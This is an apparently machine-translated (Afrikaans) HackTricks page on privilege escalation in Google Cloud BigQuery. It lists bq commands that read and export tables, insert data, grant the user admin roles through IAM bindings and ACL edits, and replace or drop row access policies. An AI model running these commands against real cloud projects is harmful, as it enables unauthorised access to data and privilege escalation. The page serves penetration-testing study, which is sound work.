GCP - BigQuery Privesc

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

BigQuery

Vir meer inligting oor BigQuery kyk:

Lees Tabel

Deur die inligting wat in 'n BigQuery tabel gestoor is te lees, mag dit moontlik wees om sensitiewe inligting te vind. Om toegang tot die inligting te verkry, is die toestemming wat benodig word bigquery.tables.get, bigquery.jobs.create en bigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Export data

Dit is nog 'n manier om toegang tot die data te verkry. Eksporteer dit na 'n wolkberging emmer en aflaai die lêers met die inligting. Om hierdie aksie uit te voer, is die volgende toestemmings nodig: bigquery.tables.export, bigquery.jobs.create en storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Voeg data in

Dit mag dalk moontlik wees om sekere vertroude data in 'n Bigquery-tabel in te voer om 'n kwesbaarheid op 'n ander plek te misbruik. Dit kan maklik gedoen word met die toestemmings bigquery.tables.get, bigquery.tables.updateData en bigquery.jobs.create:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

`bigquery.datasets.setIamPolicy`

'n Aanvaller kan hierdie voorreg misbruik om vir homself verdere toestemmings oor 'n BigQuery-dataset te gee:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Net hierdie toestemming laat jou toe om jou toegang oor 'n BigQuery-dataset op te dateer deur die ACLs te wysig wat aandui wie toegang het:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

`bigquery.tables.setIamPolicy`

'n Aanvaller kan hierdie voorreg misbruik om vir homself verdere toestemmings oor 'n BigQuery-tabel te gee:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Volgens die dokumentasie is dit met die genoemde toestemmings moontlik om 'n rybeleid op te dateer. E however, met die cli bq benodig jy nog 'n paar: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Dit is moontlik om die filter-ID in die uitvoer van die rybeleide enumerasie te vind. Voorbeeld:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

As jy bigquery.rowAccessPolicies.delete in plaas van bigquery.rowAccessPolicies.update het, kan jy ook net die beleid verwyder:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

'n Ander potensiële opsie om rytoegangbeleide te omseil, sou wees om net die waarde van die beperkte data te verander. As jy net kan sien wanneer term Cfba is, verander dan al die rekords van die tabel om term = "Cfba" te hê. Dit word egter deur bigquery voorkom.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousGCP - Batch Privesc NextGCP - ClientAuthConfig Privesc

Last updated 3 days ago

BigQuery

Lees Tabel

Export data

Voeg data in

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

BigQuery

Lees Tabel

Export data

Voeg data in

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`